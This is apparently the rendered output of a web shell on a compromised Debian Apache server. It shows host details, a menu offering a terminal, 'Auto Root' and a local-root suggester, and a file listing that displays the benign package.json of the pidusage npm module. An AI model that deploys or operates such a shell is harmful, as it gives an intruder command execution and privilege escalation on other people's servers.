Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
node_modules /
pm2 /
node_modules /
pidusage /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxr-xr-x
2025-04-08 13:05
LICENSE
1.05
KB
-rw-r--r--
2025-04-08 13:05
README.md
7.59
KB
-rw-r--r--
2025-04-08 13:05
index.js
1.06
KB
-rw-r--r--
2025-04-08 13:05
package.json
1.19
KB
-rw-r--r--
2025-04-08 13:05
Save
Rename
{ "name": "pidusage", "version": "3.0.2", "description": "Cross-platform process cpu % and memory usage of a PID", "license": "MIT", "homepage": "https://github.com/soyuka/pidusage", "repository": "github:soyuka/pidusage", "bugs": { "url": "https://github.com/soyuka/pidusage/issues" }, "author": "soyuka", "contributors": [ "Simone Primarosa <simonepri@outlook.com> (https://simoneprimarosa.com)" ], "main": "index.js", "files": [ "lib", "index.js" ], "engines": { "node": ">=10" }, "scripts": { "lint": "standard", "test": "nyc ava -m \"!*benchmark*\"", "coverage": "codecov", "bench": "ava -m \"*benchmark*\"" }, "dependencies": { "safe-buffer": "^5.2.1" }, "devDependencies": { "ava": "^3.10.1", "codecov": "^3.7.0", "mockdate": "^2.0.5", "mockery": "^2.1.0", "nyc": "^15.1.0", "pify": "^3.0.0", "standard": "^16.0.4", "string-to-stream": "^1.1.1", "through": "^2.3.8", "time-span": "^2.0.0" }, "keywords": [ "pid", "usage", "ps", "cpu", "memory", "proc" ], "ava": { "verbose": true }, "nyc": { "reporter": [ "lcovonly", "text" ] } }